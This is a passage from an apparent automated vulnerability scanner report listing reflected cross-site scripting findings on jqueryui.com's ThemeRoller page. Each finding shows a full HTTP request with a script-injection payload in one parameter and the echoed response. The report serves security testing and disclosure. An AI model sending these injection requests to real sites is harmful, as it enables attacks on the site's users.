bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65a8152"><script>alert(1)</script>eb15dc8b101&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

1.124. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fd37"><script>alert(1)</script>061b5e7f4a3 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=757fd37"><script>alert(1)</script>061b5e7f4a3&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=757fd37"><script>alert(1)</script>061b5e7f4a3&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefaul
...[SNIP]...

1.125. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d15"><script>alert(1)</script>a4b6ff2924a was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75c9d15"><script>alert(1)</script>a4b6ff2924a&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75c9d15"><script>alert(1)</script>a4b6ff2924a&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgC
...[SNIP]...

1.126. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f342"><script>alert(1)</script>04fea7ef422 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=953f342"><script>alert(1)</script>04fea7ef422&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=953f342"><script>alert(1)</script>04fea7ef422&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

1.127. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ceca"><script>alert(1)</script>c193cb4b460 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=759ceca"><script>alert(1)</script>c193cb4b460&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=759ceca"><script>alert(1)</script>c193cb4b460&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22
...[SNIP]...

1.128. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3f10"><script>alert(1)</script>67e88ebfbd was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55a3f10"><script>alert(1)</script>67e88ebfbd&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55a3f10"><script>alert(1)</script>67e88ebfbd&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

1.129. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a63d"><script>alert(1)</script>4a44203b28e was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=753a63d"><script>alert(1)</script>4a44203b28e&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=753a63d"><script>alert(1)</script>4a44203b28e&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgC
...[SNIP]...

1.130. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93f4d"><script>alert(1)</script>713c33ea2ff was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=093f4d"><script>alert(1)</script>713c33ea2ff&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=093f4d"><script>alert(1)</script>713c33ea2ff&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

1.131. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1583f"><script>alert(1)</script>671ff3b070b was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=01583f"><script>alert(1)</script>671ff3b070b&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=01583f"><script>alert(1)</script>671ff3b070b&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.132. http://jqueryui.com/themeroller/ [bgTextureActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d09d8"><script>alert(1)</script>0a734e37c76 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.pngd09d8"><script>alert(1)</script>0a734e37c76&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
